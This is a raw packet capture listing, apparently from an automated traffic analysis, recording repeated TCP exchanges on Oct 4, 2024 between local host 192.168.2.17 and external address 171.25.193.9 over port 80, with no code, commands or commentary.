                                                                              Oct 4, 2024 08:44:27.607280016 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.607327938 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607345104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607356071 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607366085 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607378960 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607403040 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607424974 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.607450962 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.607624054 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607635975 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607646942 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607657909 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607669115 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607718945 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.607718945 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.656150103 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.656289101 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.661137104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680690050 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680720091 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680732012 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680829048 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.680865049 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680876017 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680887938 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680901051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.680939913 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.680939913 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.681145906 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681164026 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681175947 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681188107 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681195021 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.681332111 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.681512117 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681524992 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681538105 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.681576967 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.681633949 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.682161093 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.682224035 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.682236910 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.682271004 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.682348013 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.682387114 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.682387114 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.694892883 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.694992065 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.695003986 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.695043087 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.695063114 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.695075989 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.695089102 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.695157051 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.695157051 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.696082115 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696129084 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696139097 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696203947 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.696223021 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696276903 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.696342945 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696355104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696417093 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.696479082 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696520090 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696541071 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696775913 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.696784019 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.696901083 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.697019100 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697082996 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697093964 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697124004 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.697181940 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697288990 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697299957 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697348118 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.697408915 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697418928 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697429895 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697484016 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.697571993 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697669029 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.697674990 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697685957 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697751045 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.697760105 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.698000908 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.698851109 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.698909998 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.698920965 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.698941946 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.698996067 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699018002 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699028015 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699234962 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699558020 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699593067 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699601889 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699616909 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699636936 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699729919 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699740887 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699752092 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699809074 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699809074 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699901104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699951887 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.699984074 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.699999094 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700051069 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700289965 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700337887 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700346947 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700356960 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700378895 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700422049 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700470924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700495005 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700520992 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700532913 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700547934 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700575113 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700608969 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700674057 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700731993 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.700757980 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700768948 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.700803995 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.708381891 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708425999 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708441019 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708487988 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.708487988 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.708539009 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708554983 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708568096 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708683968 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.708816051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708863020 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.708863020 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.708889008 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708903074 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.708934069 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.709018946 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.709033012 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.709141970 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.709150076 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.709167957 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.710340023 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.711540937 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.711597919 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.711597919 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.711610079 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.711649895 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712194920 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712266922 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712279081 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712296963 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712332964 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712332964 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712399006 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712452888 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712497950 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712497950 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712532043 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712558031 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712615967 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712615967 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712646961 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712656975 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712762117 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712780952 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712795019 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712840080 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.712857008 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712867975 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.712941885 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.756311893 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.786284924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.786663055 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.788448095 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788549900 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.788566113 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788579941 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788666964 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.788702965 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788717985 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788732052 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788773060 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.788824081 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.788919926 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.788932085 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789015055 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789015055 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789057016 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789067984 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789079905 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789098978 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789158106 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789261103 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789272070 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789282084 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789294004 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789304972 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789315939 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789340019 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789362907 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789542913 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789649010 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789655924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789670944 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789700031 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789700031 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789793968 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789805889 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789819002 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789824963 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789830923 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.789843082 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.789932013 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.790867090 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.790918112 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.790930986 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.790947914 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.791016102 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.791016102 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.791675091 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804183006 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804475069 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804501057 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804513931 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804527044 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804538965 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804548979 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.804549932 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.804550886 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804564953 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804577112 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804589033 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804600000 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804613113 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.804613113 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.804678917 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.804968119 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804980040 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.804991961 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805046082 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805046082 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805145025 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805156946 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805167913 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805179119 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805190086 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805221081 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805221081 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805270910 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805502892 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805515051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805533886 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805665016 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805668116 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805675983 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805687904 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805700064 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805711031 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805721998 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.805732965 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805732965 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.805810928 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.806022882 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.806035042 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.806046009 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.806193113 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.808247089 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808259010 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808270931 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808362007 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.808362007 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.808414936 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808463097 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.808506966 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808509111 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808512926 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808603048 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.808768034 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.808819056 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809083939 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809096098 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809146881 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809272051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809277058 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809382915 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809458971 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809472084 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809483051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809494972 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809506893 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809519053 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809606075 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809631109 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809644938 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809648991 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809700012 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809890985 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809901953 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809914112 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.809974909 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.809974909 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.810050964 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810062885 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810108900 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.810169935 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810214043 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.810353041 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810364962 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810376883 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810436010 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.810524940 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810537100 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810549021 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810559988 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.810580969 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.810605049 CEST4972580192.168.2.17171.25.193.9
